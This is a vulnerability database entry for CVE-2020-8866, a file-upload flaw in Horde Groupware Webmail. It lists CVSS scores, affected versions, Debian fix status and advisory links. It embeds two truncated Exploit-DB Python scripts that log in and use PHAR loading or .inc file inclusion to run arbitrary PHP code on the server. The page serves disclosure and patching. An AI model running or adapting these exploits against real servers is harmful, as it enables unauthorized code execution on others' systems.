CVE-2020-8866
Published 2020-03-23
Priority P3 · 55 · medium · CVSS 3.1: 6.5
AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
EXPLOIT
EPSS: 9.58% (94.9th percentile)
This vulnerability allows remote attackers to create arbitrary files on affected installations of Horde Groupware Webmail Edition 5.2.22. Authentication is required to exploit this vulnerability. The specific flaw exists within add.php. The issue results from the lack of proper validation of user-supplied data, which can allow the upload of arbitrary files. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the www-data user. Was ZDI-CAN-10125.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| debian | php-horde-form | < php-horde-form 2.0.20-1 (bookworm) | php-horde-form 2.0.20-1 (bookworm) |
| horde | groupware | — | — |
| horde | groupware_webmail_edition | — | — |
| horde | horde_form | < 2.0.20 | 2.0.20 |
CVSS provenance
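| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 6.5 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N |
| nvd | v3.0 | 4.3 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N |
| nvd | v2.0 | 4.0 | MEDIUM | AV:N/AC:L/Au:S/C:N/I:P/A:N |
| osv | — | 6.5 | MEDIUM | — |
| vendor_debian | — | 6.5 | MEDIUM | — |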
GHSA
GHSA-xrh9-pr8p-fpqj
ghsa_unreviewed · 2022-05-24
CVE-2020-8866 [MEDIUM] CWE-434
OSV
CVE-2020-8866 [MEDIUM]
osv · 2020-03-23 · CVSS 6.5
Debian
CVE-2020-8866 [MEDIUM]: php-horde-form
vendor_debian · 2020 · CVSS 6.5
Scope: local
bookworm: resolved (fixed in 2.0.20-1)
bullseye: resolved (fixed in 2.0.20-1)
sid: resolved (fixed in 2.0.20-1)
No detection rules found.
Exploit-DB
Horde Groupware Webmail Edition 5.2.22 - PHAR Loading
exploitdb·2020-03-11
---
```python
## exploit-phar-loading.py
#!/usr/bin/env python3
from horde import Horde
import requests
import subprocess
import sys

TEMP_DIR = '/tmp'
WWW_ROOT = '/var/www/html'

# expects five arguments: base_url, username, password, filename, php_code
if len(sys.argv) < 6:
    sys.exit(1)

base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]

source = '{}/{}.phar'.format(TEMP_DIR, filename)
destination = '{}/static/{}.php'.format(WWW_ROOT, filename)  # destination (delete manually)
temp = 'temp.phar'
url = '{}/static/{}.php'.format(base_url, filename)

# log into the web application
horde = Horde(base_url, username, password)

# create a PHAR that performs a rename when loaded and runs the payload when executed
subprocess.run([
    'php', 'create-renaming-phar.php'
```
Exploit-DB
Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion
exploitdb·2020-03-11
---
```python
## exploit-inc-inclusion.py
#!/usr/bin/env python3
from horde import Horde
import subprocess
import sys

TEMP_DIR = '/tmp'

# expects five arguments: base_url, username, password, filename, php_code
if len(sys.argv) < 6:
    sys.exit(1)

base_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
filename = sys.argv[4]
php_code = sys.argv[5]

# log into the web application
horde = Horde(base_url, username, password)

# upload (delete manually) and evaluate the .inc file
horde.upload_to_tmp('{}.inc'.format(filename), '<?php {} die();'.format(php_code))
horde.include_remote_inc_file('{}/{}'.format(TEMP_DIR, filename))
## exploit-inc-inclusion.py EOF
```

```python
## horde.py
import re
import requests

class Horde():
    def __init__(self, base_url, username, password):
        self.base_url = base_url
        self.username = use
```
No writeups or analysis indexed.
https://lists.debian.org/debian-lts-announce/2020/03/msg00036.html
https://lists.horde.org/archives/announce/2020/001288.html
https://www.zerodayinitiative.com/advisories/ZDI-20-275/
Published: 2020-03-23